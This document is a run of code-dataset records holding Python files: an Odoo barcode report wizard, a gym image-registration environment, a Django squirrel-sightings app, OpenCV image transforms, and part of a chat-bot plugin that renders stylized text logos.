fields.Many2one(comodel_name='stock.location', string='Ucicacion', domain=[('usage','=','internal')])\n line_ids = fields.Many2many( 'product.barcode.line.wizard',string='Lineas de productos', default=_prod_calc)\n clase_prod = fields.Char(string='classs')\n \n @api.onchange('pricelist_id')\n def onchange_pricelist(self):\n product=self.env['product.product'].browse(self._context.get('active_ids'))\n if self.pricelist_id:\n values = []\n for prod in product:\n price = self.pricelist_id.get_product_price(prod, 1, False)\n values.append((0,0, {'product_id': prod, 'price_unit': price, 'quantity': 1 }))\n self.line_ids = [(5,0,0)]\n self.line_ids = values\n\n @api.multi\n def generate_report(self):\n \"\"\"\n To get the date and print the report\n @return: return report\n \"\"\"\n self.ensure_one()\n print('CONTEXT: ', self.env.context)\n data = {'ids': self.env.context.get('active_ids', [])}\n res = self.read()\n res = res and res[0] or {}\n data.update({'form': res})\n print('DATA: ', data)\n return self.env.ref('fuci_base.action_barcode_report').report_action(self, data=data)\n\n \n \n \n \n\n\n \n \n \n \n ","sub_path":"fuci_base/wizards/product_barcode.py","file_name":"product_barcode.py","file_ext":"py","file_size_in_byte":2440,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"517271306","text":"import time\nimport pyglet\nimport gym\nfrom gym import error, spaces, utils\nfrom gym.utils import seeding\nimport numpy as np\nimport cv2\nimport h5py\nfrom copy import deepcopy\n\nACTION_MEANING = {\n 0 : \"RIGHT\",\\\n 1 : \"LEFT\",\\\n 2 : \"DOWN\",\\\n 3 : \"UP\",\\\n}\n\nclass ImgRegTrainv2(gym.Env):\n def __init__(self):\n self.viewer = None\n self.height, self.width = 64, 64\n self.observation_space = spaces.Box(low = 0, high = 1.0, shape= (2, self.height, self.width))\n self.bound = 25\n self.action_space = spaces.Discrete(4)\n self.registered = False\n self.max_steps = 50\n self.max_steps_min = 50\n self.close = 5\n self.epochs = 1\n self.steps = 0\n self.track_reward = 0.0\n\n def _step(self, action):\n self.steps += 1\n reward = self.act(int(action))\n ob = self._get_obs()\n return ob, reward, self.registered, {'Hi' : 'boss'}\n\n def preprocess(self, state):\n return state / 255.0\n\n def _reset(self):\n self.initialize()\n self.state = self.preprocess(np.stack([self.def_image, self.trans_image], axis = 0))\n self.registered = False\n self.tstate = np.float32([0, 0])\n self.steps = 0\n\n return self._get_obs()\n\n def _get_obs(self):\n return self.state\n\t\n def _get_image(self):\n return 255 * self.state\n\n def initialize(self):\n print(\"Number of steps = {}/{}\".format(self.steps, self.max_steps))\n print(\"Episode-{} in epoch {}, reward = {}\".format(self.count_in_epoch, self.epochs, self.track_reward))\n self.track_reward = 0.0\n self.ref_image = deepcopy(self.X[self.count_in_epoch][0])\n self.def_image = deepcopy(self.X[self.count_in_epoch][1])\n self.trans_image = deepcopy(self.ref_image)\n self.target = np.float32(self.Y[self.count_in_epoch])\n\n self.count_in_epoch += 1\n\n if self.count_in_epoch % 25 == 0:\n if self.max_steps > self.max_steps_min:\n self.max_steps -= 1\n\n if self.count_in_epoch == self.X.shape[0]:\n self.count_in_epoch = 0\n self.epochs += 1\n x = np.arange(self.X.shape[0])\n np.random.shuffle(x)\n self.X, self.Y = self.X[x], self.Y[x]\n\n def act(self, action):\n # Get direction of action\n old_tstate = deepcopy(self.tstate)\n direction = int(action / 2)\n sign = 1 if action % 2 == 0 else -1\n update = self.tstate[direction] + sign\n # Check bound \n if np.abs(update) <= self.bound:\n self.tstate[direction] = update\n # The action\n self.tmatrix = np.float32([[1, 0, self.tstate[0]], [0, 1, self.tstate[1]]])\n self.trans_image = cv2.warpAffine(self.ref_image, self.tmatrix, (self.height, self.width))\n self.state = self.preprocess(np.stack([self.def_image, self.trans_image], axis = 0))\n\n # Rewards\n D_old = np.abs(old_tstate[direction] - self.target[direction])\n D_new = np.abs(self.tstate[direction] - self.target[direction])\n reward = (D_old * D_old - D_new * D_new) / (2 * self.bound + 1)\n D = np.max(np.abs(self.tstate - self.target))\n\n # Additional rewards\n if D == 0:\n reward += 5.0\n terminate = True\n else:\n terminate = False\n\n # Episode termination\n if terminate == True or self.steps == self.max_steps:\n self.registered = True\n \n #if self.count_in_epoch % 50 == 0:\n # self.render()\n # time.sleep(0.1)\n # #print(\"Action = {}, old = {}, new = {}, reward = {}\".format(ACTION_MEANING[action], old_tstate, self.tstate, reward))\n\n self.track_reward += reward\n return reward\n\n def loadData(self, data_path):\n dataset = h5py.File(data_path, 'r')\n self.X, self.Y = dataset['X'][:], dataset['Y'][:]\n self.count_in_epoch = 0\n print(\"size of the data:\", self.X.shape)\n\n def render(self, mode = 'human', close = False):\n img = self._get_image()\n if self.viewer is None:\n self.viewer = SimpleImageViewer()\n self.viewer.imshow(img)\n\nclass SimpleImageViewer(object):\n def __init__(self, display=None):\n self.window = None\n self.isopen = False\n self.display = display\n def imshow(self, arr):\n def_image, trans_image = arr[0], arr[1]\n image = np.zeros((64, 64))\n image += def_image / 3\n image += trans_image\n if self.window is None:\n height, width = image.shape\n self.window = pyglet.window.Window(width = 5 * width, height = 5 * height, display = self.display)\n self.width = width\n self.height = height\n self.isopen = True\n cv2.imwrite('image.jpg', image)\n image = cv2.imread('image.jpg', 0)\n image = pyglet.image.ImageData(self.width, self.height, 'I', image.tobytes(), pitch = self.width * -1)\n self.window.clear()\n self.window.switch_to()\n self.window.dispatch_events()\n image.blit(2 * self.width, 2 * self.height)\n self.window.flip()\n\n def close(self):\n if self.isopen:\n self.window.close()\n self.isopen = False\n def __del__(self):\n self.close()\n\n","sub_path":"imgreg/imgreg/envs/imgreg_train_v2_env.py","file_name":"imgreg_train_v2_env.py","file_ext":"py","file_size_in_byte":5359,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"272082468","text":"from django.shortcuts import render\nfrom django.http import HttpResponse\nfrom .models import Sighting\nfrom django.template import loader\nfrom django.shortcuts import redirect\nfrom .forms import SightingForm\n\ndef index(request):\n \n latest_sighting_list = Sighting.objects.all()\n template = loader.get_template('sightings/index.html')\n context = {\n 'latest_sighting_list': latest_sighting_list,\n }\n return HttpResponse(template.render(context, request))\n\n\ndef add(request):\n if request.method == 'POST':\n form = SightingForm(request.POST)\n if form.is_valid():\n form.save()\n return redirect(f'/sightings/')\n else:\n form = SightingForm()\n context = {\n 'form': form,\n }\n return render(request, 'sightings/details.html', context)\n\ndef stats(request):\n template = loader.get_template('sightings/stats.html')\n total_number = Sighting.objects.all().count()\n pm_shift = Sighting.objects.filter(shift='PM').count()\n am_shift = Sighting.objects.filter(shift='AM').count()\n num_of_adults = Sighting.objects.filter(age='Adult').count()\n num_of_juveniles = Sighting.objects.filter(age='Juvenile').count()\n num_of_climbing = Sighting.objects.filter(climbing = True).count()\n context = {\n 'total_number': total_number,\n 'pm_shift': pm_shift,\n 'am_shift': am_shift,\n 'num_of_adults': num_of_adults,\n 'num_of_juveniles':num_of_juveniles,\n 'num_of_climbing': num_of_climbing,\n }\n return HttpResponse(template.render(context, request))\n\ndef details(request, unique_squirrel_id):\n sighting = Sighting.objects.get(unique_squirrel_id = unique_squirrel_id)\n if request.method == 'POST':\n form = SightingForm(request.POST, instance = sighting)\n if form.is_valid():\n form.save()\n return redirect(f'/sightings/')\n else:\n form = SightingForm(instance=sighting)\n context = {\n 'form': form,\n }\n return render(request, 'sightings/details.html', context)\n\n\n","sub_path":"sightings/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2122,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"33372360","text":"from __future__ import division\n\nimport cv2\nimport torch\nimport random\nimport numbers\n\n__all__ = [\"Compose\", \"ToTensor\", \"Normalize\", \"Resize\", \"CenterCrop\", \"RandomCrop\", \"RandomHorizontalFlip\"]\n\n\n_cv2_interpolation_to_str = {\n cv2.INTER_NEAREST: 'cv2.INTER_NEAREST',\n cv2.INTER_LINEAR: 'cv2.INTER_LINEAR',\n cv2.INTER_AREA: 'cv2.INTER_AREA',\n cv2.INTER_CUBIC: 'cv2.INTER_CUBIC',\n cv2.INTER_LANCZOS4: 'cv2.INTER_LANCZOS4',\n}\n\n\nclass Compose(object):\n \"\"\"Composes several transforms together.\n\n Args:\n transforms (list of ``Transform`` objects): list of transforms to compose.\n\n Example:\n >>> transforms.Compose([\n >>> transforms.CenterCrop(10),\n >>> transforms.ToTensor(),\n >>> ])\n \"\"\"\n\n def __init__(self, transforms):\n self.transforms = transforms\n\n def __call__(self, img):\n for t in self.transforms:\n img = t(img)\n return img\n\n def __repr__(self):\n format_string = self.__class__.__name__ + '('\n for t in self.transforms:\n format_string += '\\n'\n format_string += ' {0}'.format(t)\n format_string += '\\n)'\n return format_string\n\n\nclass ToTensor(object):\n \"\"\"Convert a ``PIL Image`` or ``numpy.ndarray`` to tensor.\n\n Converts a PIL Image or numpy.ndarray (H x W x C) in the range\n [0, 255] to a torch.FloatTensor of shape (C x H x W) in the range [0.0, 1.0].\n \"\"\"\n\n def __call__(self, array):\n \"\"\"\n Args:\n np.array: array to be converted to tensor.\n\n Returns:\n Tensor: Converted array.\n \"\"\"\n array = torch.from_numpy(array.transpose((2, 0, 1)))\n return array.float().div(255.)\n\n def __repr__(self):\n return self.__class__.__name__ + '()'\n\n\nclass Normalize(object):\n \"\"\"Normalize a tensor image with mean and standard deviation.\n Given mean: ``(M1,...,Mn)`` and std: ``(S1,..,Sn)`` for ``n`` channels, this transform\n will normalize each channel of the input ``torch.*Tensor`` i.e.\n ``input[channel] = (input[channel] - mean[channel]) / std[channel]``\n\n Args:\n mean (sequence): Sequence of means for each channel.\n std (sequence): Sequence of standard deviations for each channel.\n \"\"\"\n\n def __init__(self, mean, std):\n self.mean = mean\n self.std = std\n\n def __call__(self, tensor):\n \"\"\"\n Args:\n tensor (Tensor): Tensor array of size (C, H, W) to be normalized.\n\n Returns:\n Tensor: Normalized Tensor array.\n \"\"\"\n for t, m, s in zip(tensor, self.mean, self.std):\n t.sub_(m).div_(s)\n return tensor\n\n def __repr__(self):\n return self.__class__.__name__ + '(mean={0}, std={1})'.format(self.mean, self.std)\n\n\nclass Resize(object):\n \"\"\"Resize the input PIL Image to the given size.\n\n Args:\n size (sequence or int): Desired output size. If size is a sequence like\n (h, w), output size will be matched to this. If size is an int,\n smaller edge of the image will be matched to this number.\n i.e, if height > width, then image will be rescaled to\n (size * height / width, size)\n interpolation (int, optional): Desired interpolation. Default is\n ``PIL.Image.BILINEAR``\n \"\"\"\n\n def __init__(self, size, interpolation=cv2.INTER_LINEAR):\n assert isinstance(size, int) or (isinstance(size, tuple) and len(size) == 2)\n self.size = size\n self.interpolation = interpolation\n\n def __call__(self, array):\n \"\"\"\n Args:\n array : np.array to be scaled.\n\n Returns:\n np.array: Rescaled array.\n \"\"\"\n if isinstance(self.size, int):\n h, w = array.shape[0], array.shape[1]\n if (w <= h and w == self.size) or (h <= w and h == self.size):\n return array\n if w < h:\n ow = self.size\n oh = int(self.size * h / w)\n return cv2.resize(array, (ow, oh), self.interpolation)\n else:\n oh = self.size\n ow = int(self.size * w / h)\n return cv2.resize(array, (ow, oh), self.interpolation)\n else:\n return cv2.resize(array, self.size, self.interpolation)\n\n def __repr__(self):\n interpolate_str = _cv2_interpolation_to_str[self.interpolation]\n return self.__class__.__name__ + '(size={0}, interpolation={1})'.format(self.size, interpolate_str)\n\n\nclass CenterCrop(object):\n \"\"\"Crops the given PIL Image at the center.\n\n Args:\n size (sequence or int): Desired output size of the crop. If size is an\n int instead of sequence like (h, w), a square crop (size, size) is\n made.\n \"\"\"\n\n def __init__(self, size):\n if isinstance(size, numbers.Number):\n self.size = (int(size), int(size))\n else:\n self.size = size\n\n def __call__(self, array):\n \"\"\"\n Args:\n np.array: array to be cropped.\n\n Returns:\n np.array: Cropped array.\n \"\"\"\n h, w = array.shape[0], array.shape[1]\n ow, oh = self.size[0], self.size[1]\n i = (h-oh)//2\n j = (w-ow)//2\n\n return array[i:i+oh, j:j+ow]\n\n def __repr__(self):\n return self.__class__.__name__ + '(size={0})'.format(self.size)\n\n\nclass RandomCrop(object):\n \"\"\"Crop the given PIL Image at a random location.\n\n Args:\n size (sequence or int): Desired output size of the crop. If size is an\n int instead of sequence like (h, w), a square crop (size, size) is\n made.\n padding (int or sequence, optional): Optional padding on each border\n of the image. Default is 0, i.e no padding. If a sequence of length\n 4 is provided, it is used to pad left, top, right, bottom borders\n respectively.\n pad_if_needed (boolean): It will pad the image if smaller than the\n desired size to avoid raising an exception.\n \"\"\"\n\n def __init__(self, size, padding=0, pad_if_needed=False):\n if isinstance(size, numbers.Number):\n self.size = (int(size), int(size))\n else:\n self.size = size\n self.padding = padding\n self.pad_if_needed = pad_if_needed\n\n @staticmethod\n def get_params(array, output_size):\n \"\"\"Get parameters for ``crop`` for a random crop.\n\n Args:\n array : np array to be cropped.\n output_size (tuple): Expected output size of the crop.\n\n Returns:\n tuple: params (i, j, h, w) to be passed to ``crop`` for random crop.\n \"\"\"\n\n h, w = array.shape[0], array.shape[1]\n tw, th = output_size\n if w == tw and h == th:\n return 0, 0, h, w\n\n i = random.randint(0, h - th)\n j = random.randint(0, w - tw)\n return i, j, th, tw\n\n def __call__(self, array):\n\n i, j, h, w = self.get_params(array, self.size)\n\n return array[i:i+h, j:j+w]\n\n def __repr__(self):\n return self.__class__.__name__ + '(size={0}, padding={1})'.format(self.size, self.padding)\n\n\nclass RandomHorizontalFlip(object):\n \"\"\"Horizontally flip the given np.array randomly with a given probability.\n\n Args:\n p (float): probability of the np.array being flipped. Default value is 0.5\n \"\"\"\n\n def __init__(self, p=0.5):\n self.p = p\n\n def __call__(self, array):\n \"\"\"\n Args:\n array : np.array to be flipped.\n\n Returns:\n np.array: Randomly flipped np.array.\n \"\"\"\n if random.random() < self.p:\n for index in range(array.shape[1] // 2):\n tmp = array[:, index].copy()\n array[:, index] = array[:, array.shape[1] - index - 1]\n array[:, array.shape[1] - index - 1] = tmp\n\n return array\n\n def __repr__(self):\n return self.__class__.__name__ + '(p={})'.format(self.p)\n\n\nif __name__ == '__main__':\n\n import scipy.misc\n image = scipy.misc.imread(\"2007_000039.jpg\", mode=\"RGB\")\n resize_img = Resize(320)(image)\n cop_img = CenterCrop(300)(image)\n random_cop_img = RandomCrop(300)(image)\n flip_img = RandomHorizontalFlip(p=1.0)(image)\n\n print(image.shape)\n print(resize_img.shape)\n print(cop_img.shape)\n print(random_cop_img.shape)\n print(flip_img.shape)\n\n cv2.imshow(\"image\", image)\n cv2.imshow(\"resize_img\", resize_img)\n cv2.imshow(\"cop_img\", cop_img)\n cv2.imshow(\"random_cop_img\", random_cop_img)\n cv2.imshow(\"flip_img\", flip_img)\n cv2.waitKey(0)","sub_path":"tools/tools.py","file_name":"tools.py","file_ext":"py","file_size_in_byte":8644,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"46618815","text":"import re\nimport numpy as np\n\nfrom io import BytesIO\nfrom math import radians, tan\nfrom graia.saya import Saya, Channel\nfrom decimal import Decimal, ROUND_HALF_UP\nfrom PIL import Image as IMG, ImageDraw, ImageFont\nfrom graia.application import GraiaMiraiApplication\nfrom graia.application.message.chain import MessageChain\nfrom graia.saya.builtins.broadcast.schema import ListenerSchema\nfrom graia.application.event.messages import Group, GroupMessage\nfrom graia.application.message.elements.internal import Plain, Image\n\nfrom util.limit import manual_limit\nfrom config import yaml_data, group_data\nfrom util.RestControl import rest_control\nfrom util.UserBlock import black_list_block\n\n\ndef _round(f, r=ROUND_HALF_UP): return int(Decimal(str(f)).quantize(Decimal(\"0\"), rounding=r))\ndef rgb(r, g, b): return (r, g, b)\n\n\nLEFT_PART_VERTICAL_BLANK_MULTIPLY_FONT_HEIGHT = 2\nLEFT_PART_HORIZONTAL_BLANK_MULTIPLY_FONT_WIDTH = 1 / 4\nRIGHT_PART_VERTICAL_BLANK_MULTIPLY_FONT_HEIGHT = 1\nRIGHT_PART_HORIZONTAL_BLANK_MULTIPLY_FONT_WIDTH = 1 / 4\nRIGHT_PART_RADII = 10\nBG_COLOR = '#000000'\nBOX_COLOR = '#F7971D'\nLEFT_TEXT_COLOR = '#FFFFFF'\nRIGHT_TEXT_COLOR = '#000000'\nFONT_SIZE = 50\n\nsaya = Saya.current()\nchannel = Channel.current()\n\n\n@channel.use(ListenerSchema(listening_events=[GroupMessage],\n headless_decorators=[rest_control(), black_list_block()]))\nasync def abbreviated_prediction_handler(app: GraiaMiraiApplication, message: MessageChain, group: Group):\n msg = await StylePictureGeneraterHandler.handle(group, message)\n if msg:\n manual_limit(group.id, \"StylePictureGenerater\", 5)\n await app.sendGroupMessage(group, msg)\n\n\nclass StylePictureGeneraterHandler():\n \"\"\"\n 风格图片生成Handler\n \"\"\"\n\n @staticmethod\n async def handle(group, message):\n message_text = message.asDisplay()\n if re.match(\"5000兆 .* .*\", message_text):\n if yaml_data['Saya']['StyleLogoGenerator']['Disabled']:\n return MessageChain.create([Plain(f\"该功能暂不开启\")])\n elif 'StyleLogoGenerator' in group_data[group.id]['DisabledFunc']:\n return MessageChain.create([Plain(f\"该功能暂不开启\")])\n return await StylePictureGeneraterHandler.gosencho_en_hoshi_style_image_generator(message)\n elif re.match(\"ph .* .*\", message_text):\n if yaml_data['Saya']['StyleLogoGenerator']['Disabled']:\n return MessageChain.create([Plain(f\"该功能暂不开启\")])\n elif 'StyleLogoGenerator' in group_data[group.id]['DisabledFunc']:\n return MessageChain.create([Plain(f\"该功能暂不开启\")])\n return await StylePictureGeneraterHandler.pornhub_style_image_generator(message)\n elif re.match(\"yt .* .*\", message_text):\n if yaml_data['Saya']['StyleLogoGenerator']['Disabled']:\n return MessageChain.create([Plain(f\"该功能暂不开启\")])\n elif 'StyleLogoGenerator' in group_data[group.id]['DisabledFunc']:\n return MessageChain.create([Plain(f\"该功能暂不开启\")])\n return await StylePictureGeneraterHandler.youtube_style_image_generator(message)\n else:\n return None\n\n @staticmethod\n async def gosencho_en_hoshi_style_image_generator(message):\n try:\n _, left_text, right_text = message.asDisplay().split(\" \")\n try:\n img_byte = BytesIO()\n GoSenChoEnHoShiStyleUtils.genImage(word_a=left_text, word_b=right_text).save(img_byte, format='PNG')\n return MessageChain.create([Image.fromUnsafeBytes(img_byte.getvalue())])\n except TypeError:\n return MessageChain.create([Plain(text=\"不支持的内容!不要给我一些稀奇古怪的东西!\")])\n except ValueError:\n return MessageChain.create([Plain(text=\"参数非法!使用格式:5000兆 text1 text2\")])\n\n @staticmethod\n async def pornhub_style_image_generator(message):\n message_text = message.asDisplay()\n if '/' in message_text or '\\\\' in message_text:\n return MessageChain.create([Plain(text=\"不支持 '/' 与 '\\\\' !\")])\n try:\n _, left_text, right_text = message_text.split(\" \")\n except ValueError:\n return MessageChain.create([Plain(text=\"格式错误!使用方法:ph left right!\")])\n try:\n return await PornhubStyleUtils.make_ph_style_logo(left_text, right_text)\n except OSError as e:\n if \"[Errno 22] Invalid argument:\" in str(e):\n return MessageChain.create([Plain(text=\"非法字符!\")])\n\n @staticmethod\n async def youtube_style_image_generator(message):\n message_text = message.asDisplay()\n if '/' in message_text or '\\\\' in message_text:\n return MessageChain.create([Plain(text=\"不支持 '/' 与 '\\\\' !\")])\n try:\n _, left_text, right_text = message_text.split(\" \")\n except ValueError:\n return MessageChain.create([Plain(text=\"格式错误!使用方法:yt left right!\")])\n try:\n return await YoutubeStyleUtils.make_yt_style_logo(left_text, right_text)\n except OSError as e:\n if \"[Errno 22] Invalid argument:\" in str(e):\n return MessageChain.create([Plain(text=\"非法字符!\")])\n\n\nclass GoSenChoEnHoShiStyleUtils:\n @staticmethod\n def get_gradient_2d(start, stop, width, height, is_horizontal=False):\n if is_horizontal:\n return np.tile(np.linspace(start, stop, width), (height, 1))\n else:\n return np.tile(np.linspace(start, stop, height), (width, 1)).T\n\n @staticmethod\n def getTextWidth(text, font, width=100, height=500, recursive=False):\n step = 100\n img = IMG.new(\"L\", (width, height))\n draw = ImageDraw.Draw(img)\n draw.text((0, 0), text, font=font, fill=255)\n box = img.getbbox()\n if box[2] < width - step or (recursive and box[2] == width - step):\n return box[2]\n else:\n return GoSenChoEnHoShiStyleUtils.getTextWidth(text=text, font=font, width=width + step, height=height,\n recursive=True)\n\n @staticmethod\n def get_gradient_3d(width, height, start_list, stop_list, is_horizontal_list=(False, False, False)):\n result = np.zeros((height, width, len(start_list)), dtype=float)\n for i, (start, stop, is_horizontal) in enumerate(zip(start_list, stop_list, is_horizontal_list)):\n result[:, :, i] = GoSenChoEnHoShiStyleUtils.get_gradient_2d(start, stop, width, height, is_horizontal)\n return result\n\n @staticmethod\n def createLinearGradient(steps, width, height):\n result = np.zeros((0, width, len(steps[0])), dtype=float)\n for i, k in enumerate(steps.keys()):\n if i == 0:\n continue\n pk = list(steps.keys())[i - 1]\n h = _round(height * (k - pk))\n array = GoSenChoEnHoShiStyleUtils.get_gradient_3d(width, h, steps[pk], steps[k])\n result = np.vstack([result, array])\n return result\n\n @staticmethod\n def genBaseImage(width=1500, height=150):\n downerSilverArray = GoSenChoEnHoShiStyleUtils.createLinearGradient({\n 0.0: rgb(0, 15, 36),\n 0.10: rgb(255, 255, 255),\n 0.18: rgb(55, 58, 59),\n 0.25: rgb(55, 58, 59),\n 0.5: rgb(200, 200, 200),\n 0.75: rgb(55, 58, 59),\n 0.85: rgb(25, 20, 31),\n 0.91: rgb(240, 240, 240),\n 0.95: rgb(166, 175, 194),\n 1: rgb(50, 50, 50)\n }, width=width, height=height)\n goldArray = GoSenChoEnHoShiStyleUtils.createLinearGradient({\n 0: rgb(253, 241, 0),\n 0.25: rgb(245, 253, 187),\n 0.4: rgb(255, 255, 255),\n 0.75: rgb(253, 219, 9),\n 0.9: rgb(127, 53, 0),\n 1: rgb(243, 196, 11)\n }, width=width, height=height)\n redArray = GoSenChoEnHoShiStyleUtils.createLinearGradient({\n 0: rgb(230, 0, 0),\n 0.5: rgb(123, 0, 0),\n 0.51: rgb(240, 0, 0),\n 1: rgb(5, 0, 0)\n }, width=width, height=height)\n strokeRedArray = GoSenChoEnHoShiStyleUtils.createLinearGradient({\n 0: rgb(255, 100, 0),\n 0.5: rgb(123, 0, 0),\n 0.51: rgb(240, 0, 0),\n 1: rgb(5, 0, 0)\n }, width=width, height=height)\n silver2Array = GoSenChoEnHoShiStyleUtils.createLinearGradient({\n 0: rgb(245, 246, 248),\n 0.15: rgb(255, 255, 255),\n 0.35: rgb(195, 213, 220),\n 0.5: rgb(160, 190, 201),\n 0.51: rgb(160, 190, 201),\n 0.52: rgb(196, 215, 222),\n 1.0: rgb(255, 255, 255)\n }, width=width, height=height)\n navyArray = GoSenChoEnHoShiStyleUtils.createLinearGradient({\n 0: rgb(16, 25, 58),\n 0.03: rgb(255, 255, 255),\n 0.08: rgb(16, 25, 58),\n 0.2: rgb(16, 25, 58),\n 1: rgb(16, 25, 58)\n }, width=width, height=height)\n result = {\n \"downerSilver\": IMG.fromarray(np.uint8(downerSilverArray)).crop((0, 0, width, height)),\n \"gold\": IMG.fromarray(np.uint8(goldArray)).crop((0, 0, width, height)),\n \"red\": IMG.fromarray(np.uint8(redArray)).crop((0, 0, width, height)),\n \"strokeRed\": IMG.fromarray(np.uint8(strokeRedArray)).crop((0, 0, width, height)),\n \"silver2\": IMG.fromarray(np.uint8(silver2Array)).crop((0, 0, width, height)),\n \"strokeNavy\": IMG.fromarray(np.uint8(navyArray)).crop((0, 0, width, height)), # Width: 7\n \"baseStrokeBlack\": IMG.new(\"RGBA\", (width, height), rgb(0, 0, 0)).crop((0, 0, width, height)),\n # Width: 17\n \"strokeBlack\": IMG.new(\"RGBA\", (width, height), rgb(16, 25, 58)).crop((0, 0, width, height)), # Width: 17\n \"strokeWhite\": IMG.new(\"RGBA\", (width, height), rgb(221, 221, 221)).crop((0, 0, width, height)),\n # Width: 8\n \"baseStrokeWhite\": IMG.new(\"RGBA\", (width, height), rgb(255, 255, 255)).crop((0, 0, width, height))\n # Width: 8\n }\n for k in result.keys():\n result[k].putalpha(255)\n return result\n\n @staticmethod\n def genImage(word_a=\"5000兆円\", word_b=\"欲しい!\", default_width=1500, height=500,\n bg=\"white\", subset=250, default_base=None):\n # width = max_width\n alpha = (0, 0, 0, 0)\n leftmargin = 50\n font_upper = ImageFont.truetype(\"./saya/StyleLogoGenerator/ttf/STKAITI.TTF\", _round(height / 3))\n font_downer = ImageFont.truetype(\"./saya/StyleLogoGenerator/ttf/STKAITI.TTF\", _round(height / 3))\n\n # Prepare Width\n upper_width = max([default_width,\n GoSenChoEnHoShiStyleUtils.getTextWidth(word_a, font_upper, width=default_width,\n height=_round(height / 2))]) + 300\n downer_width = max([default_width,\n GoSenChoEnHoShiStyleUtils.getTextWidth(word_b, font_upper, width=default_width,\n height=_round(height / 2))]) + 300\n\n # Prepare base - Upper (if required)\n if default_width == upper_width:\n upper_base = default_base\n else:\n upper_base = GoSenChoEnHoShiStyleUtils.genBaseImage(width=upper_width, height=_round(height / 2))\n\n # Prepare base - Downer (if required)\n downer_base = GoSenChoEnHoShiStyleUtils.genBaseImage(width=downer_width + leftmargin, height=_round(height / 2))\n # if default_width == downer_width:\n # downer_base = default_base\n # else:\n\n # Prepare mask - Upper\n upper_mask_base = IMG.new(\"L\", (upper_width, _round(height / 2)), 0)\n\n mask_img_upper = list()\n upper_data = [\n [\n (4, 4), (4, 4), (0, 0), (0, 0), (0, 0), (0, 0), (0, 0)\n ], [\n 22, 20, 16, 10, 6, 6, 4, 0\n ], [\n \"baseStrokeBlack\",\n \"downerSilver\",\n \"baseStrokeBlack\",\n \"gold\",\n \"baseStrokeBlack\",\n \"baseStrokeWhite\",\n \"strokeRed\",\n \"red\",\n ]\n ]\n for pos, stroke, color in zip(upper_data[0], upper_data[1], upper_data[2]):\n mask_img_upper.append(upper_mask_base.copy())\n mask_draw_upper = ImageDraw.Draw(mask_img_upper[-1])\n mask_draw_upper.text((pos[0], pos[1]), word_a,\n font=font_upper, fill=255,\n stroke_width=_round(stroke * height / 500))\n\n # Prepare mask - Downer\n downer_mask_base = IMG.new(\"L\", (downer_width + leftmargin, _round(height / 2)), 0)\n mask_img_downer = list()\n downer_data = [\n [\n (5, 2), (5, 2), (0, 0), (0, 0), (0, 0), (0, -3)\n ], [\n 22, 19, 17, 8, 7, 0\n ], [\n \"baseStrokeBlack\",\n \"downerSilver\",\n \"strokeBlack\",\n \"strokeWhite\",\n \"strokeNavy\",\n \"silver2\"\n ]\n ]\n for pos, stroke, color in zip(downer_data[0], downer_data[1], downer_data[2]):\n mask_img_downer.append(downer_mask_base.copy())\n mask_draw_downer = ImageDraw.Draw(mask_img_downer[-1])\n mask_draw_downer.text((pos[0] + leftmargin, pos[1]), word_b,\n font=font_downer, fill=255,\n stroke_width=_round(stroke * height / 500))\n\n # Draw text - Upper\n img_upper = IMG.new(\"RGBA\", (upper_width, _round(height / 2)), alpha)\n\n for i, (pos, stroke, color) in enumerate(zip(upper_data[0], upper_data[1], upper_data[2])):\n img_upper_part = IMG.new(\"RGBA\", (upper_width, _round(height / 2)), alpha)\n img_upper_part.paste(upper_base[color], (0, 0), mask=mask_img_upper[i])\n img_upper.alpha_composite(img_upper_part)\n\n # Draw text - Downer\n img_downer = IMG.new(\"RGBA\", (downer_width + leftmargin, _round(height / 2)), alpha)\n for i, (pos, stroke, color) in enumerate(zip(downer_data[0], downer_data[1], downer_data[2])):\n img_downer_part = IMG.new(\"RGBA\", (downer_width + leftmargin, _round(height / 2)), alpha)\n img_downer_part.paste(downer_base[color], (0, 0), mask=mask_img_downer[i])\n img_downer.alpha_composite(img_downer_part)\n\n # tilt image\n tiltres = list()\n angle = 20\n for img in [img_upper, img_downer]:\n dist = img.height * tan(radians(angle))\n data = (1, tan(radians(angle)), -dist, 0, 1, 0)\n imgc = img.crop((0, 0, img.width + dist, img.height))\n imgt = imgc.transform(imgc.size, IMG.AFFINE, data, IMG.BILINEAR)\n tiltres.append(imgt)\n\n # finish\n previmg = IMG.new(\"RGBA\", (max([upper_width, downer_width]) + leftmargin + 300 + 100, height + 100),\n (255, 255, 255, 0))\n previmg.alpha_composite(tiltres[0], (0, 50), (0, 0))\n previmg.alpha_composite(tiltres[1], (subset, _round(height / 2) + 50), (0, 0))\n croprange = previmg.getbbox()\n img = previmg.crop(croprange)\n final_image = IMG.new(\"RGB\", (img.size[0] + 100, img.size[1] + 100), bg)\n final_image.paste(img, (50, 50))\n\n return final_image\n\n\nclass PornhubStyleUtils:\n @staticmethod\n async def create_left_part_img(text: str, font_size: int):\n font = ImageFont.truetype('./saya/StyleLogoGenerator/ttf/ArialEnUnicodeBold.ttf', font_size)\n font_width, font_height = font.getsize(text)\n offset_y = font.font.getsize(text)[1][1]\n blank_height = font_height * LEFT_PART_VERTICAL_BLANK_MULTIPLY_FONT_HEIGHT\n right_blank = int(font_width / len(text) * LEFT_PART_HORIZONTAL_BLANK_MULTIPLY_FONT_WIDTH)\n img_height = font_height + offset_y + blank_height * 2\n image_width = font_width + right_blank\n image_size = image_width, img_height\n image = IMG.new('RGBA', image_size, BG_COLOR)\n draw = ImageDraw.Draw(image)\n draw.text((0, blank_height), text, fill=LEFT_TEXT_COLOR, font=font)\n return image\n\n @staticmethod\n async def create_right_part_img(text: str, font_size: int):\n radii = RIGHT_PART_RADII\n font = ImageFont.truetype('./saya/StyleLogoGenerator/ttf/ArialEnUnicodeBold.ttf', font_size)\n font_width, font_height = font.getsize(text)\n offset_y = font.font.getsize(text)[1][1]\n blank_height = font_height * RIGHT_PART_VERTICAL_BLANK_MULTIPLY_FONT_HEIGHT\n left_blank = int(font_width / len(text) * RIGHT_PART_HORIZONTAL_BLANK_MULTIPLY_FONT_WIDTH)\n image_width = font_width + 2 * left_blank\n 